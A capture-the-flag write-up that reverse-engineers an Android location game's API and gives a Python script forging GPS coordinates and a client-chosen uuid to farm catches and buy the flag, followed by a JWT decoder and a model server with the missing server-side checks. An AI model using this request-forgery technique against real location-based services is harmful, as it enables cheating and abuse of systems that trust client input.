IceCTF – Poke a Mango

This challenge gives us an APK file to download, pokeamango.apk.

Analysis

This Android application is a Pokémon GO clone: you walk around catching mangoes, and once you have caught 151 of them you can buy the flag in the store. Decompiling the APK with jadx-gui shows the HTTP requests the app makes, which is all we need. The first request lists the «mangoes» near the position the app reports:

REQUEST:

POST /mango/list HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 51
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

lat=41.0777778&long=1.1799998&uuid=8fb6f1840fee5a88


RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 09:50:54 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 459178f855833c1d-CDG
Content-Length: 866

{"mangos":[{"lat":41.0775367,"lng":1.1778177},{"lat":41.07847469999999,"lng":1.1795604},{"lat":41.0794147,"lng":1.1805652},{"lat":41.07758399999999,"lng":1.1782649},{"lat":41.0791775,"lng":1.1795028},{"lat":41.0782402,"lng":1.1797446},{"lat":41.0774597,"lng":1.1774596},{"lat":41.0781927,"lng":1.1809616},{"lat":41.0764728,"lng":1.1798654},{"lat":41.0764401,"lng":1.1799138},{"lat":41.076082,"lng":1.179158},{"lat":41.077837,"lng":1.1797852},{"lat":41.07882900000001,"lng":1.17955},{"lat":41.076564,"lng":1.179783},{"lat":41.0772666,"lng":1.1797385},{"lat":41.0773042,"lng":1.1791576},{"lat":41.07715779999999,"lng":1.1810705},{"lat":41.076599,"lng":1.180543},{"lat":41.0767187,"lng":1.1809404},{"lat":41.07724479999999,"lng":1.178256}],"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}

And a second request catches one of them. Note that both our current position and the mango's position are sent by the client:

REQUEST:

POST /mango/catch HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 97
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

curLat=41.0777778&curLong=1.1799998&mangoLat=41.0775367&mangoLong=1.1778177&uuid=8fb6f1840fee5a88



RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 09:53:13 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 45917c57f3523bf3-CDG
Content-Length: 156

{"message":"Mango Caught!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}
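Every response carries a token. It is a JWT signed with HS256, and decoding it (the code below is my own added example, not part of the writeup or the app) shows the payload holds nothing but the uuid. Just as telling, none of the captured requests ever sends the token back: the only identity the server acts on is the bare uuid in the form body, which the client chooses. The second token decoded here is the one returned to the script's final request, which used a different uuid.

```python
import base64
import json

# Tokens copied from the captured responses: the first from the /mango/list and
# /mango/catch responses (uuid ...5a88), the second from the script's final
# /store/flag response (uuid ...5a77).
TOKEN_88 = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
            "eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9."
            "IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg")
TOKEN_77 = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
            "eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE3NyJ9."
            "7b1ZlrmCDiWimU2JdKnfkbwuUZkoOTvvIYU1x9JTUJ4")


def b64url_decode(segment):
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment.encode("ascii"))


def decode_jwt_unverified(token):
    """Split a JWT into (header, payload, signature_bytes) WITHOUT checking the
    signature. Fine for seeing what a token carries; without the server's HMAC
    key nothing here proves the token is genuine, so never trust it this way."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            b64url_decode(sig_b64))


def uuid_in_token(token):
    """The only claim these tokens contain."""
    return decode_jwt_unverified(token)[1]["uuid"]


if __name__ == "__main__":
    for t in (TOKEN_88, TOKEN_77):
        header, payload, sig = decode_jwt_unverified(t)
        print(header, payload, "%d-byte signature" % len(sig))
```

Both payloads are just `{"uuid": ...}` with a 32-byte HMAC-SHA256 signature. A server that wanted progress bound to a session it controls would require this token on every request and verify the signature; here it is issued and then ignored.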

Well, with these two requests we can catch 151 mangoes without moving at all, since the server accepts whatever positions we send (the script below also polls /mango/count to know when we have reached 151), and then get the flag with this request:

REQUEST:

POST /store/flag HTTP/1.1
Host: pokeamango.vuln.icec.tf
Content-Length: 21
Accept: */*
Origin: file://
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: __cfduid=d36133fde362614f502d0a864fb307a611536327276
X-Requested-With: tf.icec.pokeamango
Connection: close

uuid=8fb6f1840fee5a88



RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2018 10:53:00 GMT
Content-Type: application/json
Connection: close
Server: cloudflare
CF-RAY: 4591d3efe0ae3c0b-CDG
Content-Length: 208

{"message":"IceCTF{gotta_poke_em_all_we_really_need_some_serverside_checking}","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE4OCJ9.IiUR3HdoRklnx7yVXMzBu3FJg3Hu0ev4L2b8RxqUBIg"}

Here is the Python script I wrote to get the flag:

#!/usr/bin/env python3
# coding: utf8

import json
import re
import sys

import requests

BASE = "http://pokeamango.vuln.icec.tf:80"
UUID = "8fb6f1840fee5a77"

# Cookie and headers copied from the app's traffic (Burp's "copy as python-requests").
# They are identical for every endpoint, so they live here instead of in each function.
COOKIES = {"__cfduid": "d36133fde362614f502d0a864fb307a611536327276"}
HEADERS = {"Accept": "*/*", "Origin": "file://", "User-Agent": "Mozilla/5.0 (Linux; Android 7.1.1; Custom Tablet - 7.1.0 - API 25 - 1536x2048 Build/NMF26Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US", "X-Requested-With": "tf.icec.pokeamango", "Connection": "close"}


def post(path, data):
	"""POST form data to the API. Returns the body on HTTP 200, or 1 on any error."""
	r = requests.post(BASE + path, headers=HEADERS, cookies=COOKIES, data=data)
	if r.status_code == 200:  # success
		return r.text
	return 1  # error


def getCoordinates(lat, lng):
	"""List the mangoes near the position we claim to be at."""
	return post("/mango/list", {"lat": lat, "long": lng, "uuid": UUID})


def getMango(clat, clng, lat, lng):
	"""Catch one mango; both our position and the mango's position come from us."""
	return post("/mango/catch", {"curLat": clat, "curLong": clng, "mangoLat": lat, "mangoLong": lng, "uuid": UUID})


def getCount():
	"""How many mangoes this uuid has caught so far."""
	return post("/mango/count", {"uuid": UUID})


def getFlag():
	"""Buy the flag; only works once the count reaches 151."""
	return post("/store/flag", {"uuid": UUID})


for j in range(100):
	for i in range(0, 999):
		# move the reported position every pass so the list endpoint hands out new mangoes
		clat = "41.0%s77778" % i  # current lat
		clng = "1.1%s99998" % i   # current long
		count = getCount()
		while count == 1:  # because the web is unstable
			count = getCount()
		# the count is the first number in the response (the first version sliced count[9:12])
		caught = re.search(r"\d+", count)
		if caught and int(caught.group()) >= 151:
			print(getFlag())
			sys.exit(0)
		response = getCoordinates(clat, clng)
		if response != 1:
			data = json.loads(response)
			for mango in data["mangos"]:
				lat = mango["lat"]
				lng = mango["lng"]
				print("sending lat %s and lng %s" % (lat, lng))
				get = getMango(clat, clng, lat, lng)
				while get == 1:  # because the web is unstable
					get = getMango(clat, clng, lat, lng)

Example of script execution:

$ python script.py
sending lat 41.0663526 and lng 1.1709858
sending lat 41.0665607 and lng 1.1705412
sending lat 41.0962592 and lng 1.2006501
sending lat 41.06087 and lng 1.16179

...

sending lat 41.0839905 and lng 1.1853429
sending lat 41.0853402 and lng 1.183156
sending lat 41.0839701 and lng 1.1853559
{"message":"IceCTF{gotta_poke_em_all_we_really_need_some_serverside_checking}","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOGZiNmYxODQwZmVlNWE3NyJ9.7b1ZlrmCDiWimU2JdKnfkbwuUZkoOTvvIYU1x9JTUJ4"}
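The flag text says it: nothing in this API is checked server-side. /mango/catch takes both the player's position and the mango's position from the client, /mango/list hands out raw coordinates instead of server-issued identifiers, and the script reports positions more than a kilometre apart within seconds without anyone noticing. As an added example of my own (not the challenge's code), here is the insecure handler modelled beside a version with the checks the server needed: spawn records kept server-side and keyed by opaque ids, a catch radius, a speed check between consecutive position reports, and one catch per spawn. The catch radius, speed limit, error messages and the flag's price are assumptions; the demo replays the coordinates captured above.

```python
import math
import secrets

# Assumed game parameters (mine, not the challenge's): catch radius, the fastest
# plausible player speed between two position reports, and the flag's price.
CATCH_RADIUS_M = 200.0
MAX_SPEED_MPS = 10.0
MANGOES_FOR_FLAG = 151


def haversine_m(lat1, lng1, lat2, lng2):
    """Great-circle distance in metres between two WGS84 points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = p2 - p1, math.radians(lng2 - lng1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371000.0 * math.asin(math.sqrt(a))


def catch_insecure(counts, uuid, cur_lat, cur_lng, mango_lat, mango_lng):
    """What the challenge server evidently does: every coordinate comes from the
    client and nothing is compared against server state, so the count just grows."""
    counts[uuid] = counts.get(uuid, 0) + 1
    return "Mango Caught!"


class MangoServer:
    """The same API with the server-side checks the flag text asks for."""

    def __init__(self):
        self.players = {}

    def _player(self, uuid):
        return self.players.setdefault(
            uuid, {"count": 0, "last_pos": None, "last_time": None, "spawned": {}})

    def _record_position(self, p, lat, lng, now):
        # Refuse movement faster than a person could manage between two reports.
        if p["last_pos"] is not None:
            dist = haversine_m(p["last_pos"][0], p["last_pos"][1], lat, lng)
            dt = max(now - p["last_time"], 1e-9)
            if dist / dt > MAX_SPEED_MPS:
                raise ValueError("implausible movement: %.0f m in %.1f s" % (dist, dt))
        p["last_pos"], p["last_time"] = (lat, lng), now

    def list_mangoes(self, uuid, lat, lng, now, positions):
        """`positions` is where the server decides to spawn mangoes. The client gets
        an opaque id per mango and may only send that id back, so it cannot invent
        a mango or move one."""
        p = self._player(uuid)
        self._record_position(p, lat, lng, now)
        listing = []
        for mlat, mlng in positions:
            mid = secrets.token_hex(8)
            p["spawned"][mid] = (mlat, mlng)
            listing.append({"id": mid, "lat": mlat, "lng": mlng})
        return listing

    def catch(self, uuid, mango_id, lat, lng, now):
        p = self._player(uuid)
        self._record_position(p, lat, lng, now)
        if mango_id not in p["spawned"]:
            raise ValueError("unknown or already caught mango")
        mlat, mlng = p["spawned"][mango_id]
        dist = haversine_m(lat, lng, mlat, mlng)
        if dist > CATCH_RADIUS_M:
            raise ValueError("mango is %.0f m away" % dist)
        del p["spawned"][mango_id]  # one catch per spawn, so no replay
        p["count"] += 1
        return p["count"]

    def flag(self, uuid):
        if self._player(uuid)["count"] < MANGOES_FOR_FLAG:
            raise PermissionError("not enough mangoes")
        return "flag would be released here"


def run_demo():
    """Replays the coordinates captured in the writeup against both servers."""
    results = {}
    srv = MangoServer()
    # The captured /mango/catch request: player and mango about 185 m apart.
    listing = srv.list_mangoes("8fb6f1840fee5a88", 41.0777778, 1.1799998, 0.0,
                               [(41.0775367, 1.1778177)])
    results["legit"] = srv.catch("8fb6f1840fee5a88", listing[0]["id"],
                                 41.0777778, 1.1799998, 5.0)
    try:  # sending the same id again is refused
        srv.catch("8fb6f1840fee5a88", listing[0]["id"], 41.0777778, 1.1799998, 10.0)
        results["replay"] = "accepted"
    except ValueError as e:
        results["replay"] = str(e)
    try:  # the script's first two reported positions: ~1.4 km apart, 5 s apart
        srv.list_mangoes("8fb6f1840fee5a77", 41.0077778, 1.1099998, 15.0, [])
        srv.list_mangoes("8fb6f1840fee5a77", 41.0177778, 1.1199998, 20.0, [])
        results["teleport"] = "accepted"
    except ValueError as e:
        results["teleport"] = str(e)
    counts = {}  # the insecure handler counts 151 catches made from anywhere
    for _ in range(MANGOES_FOR_FLAG):
        catch_insecure(counts, "8fb6f1840fee5a77", 0.0, 0.0, 99.0, 99.0)
    results["insecure_count"] = counts["8fb6f1840fee5a77"]
    return results
```

The legitimate catch from the captured traffic passes (about 185 m, inside the assumed radius), replaying the same id fails, and the script's jump between its first two reported positions is rejected as impossible movement, while the insecure handler happily counts 151 catches from nowhere near any mango. Identity would still need fixing separately: with a client-chosen uuid, a cheater just picks a fresh one.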

Cheers!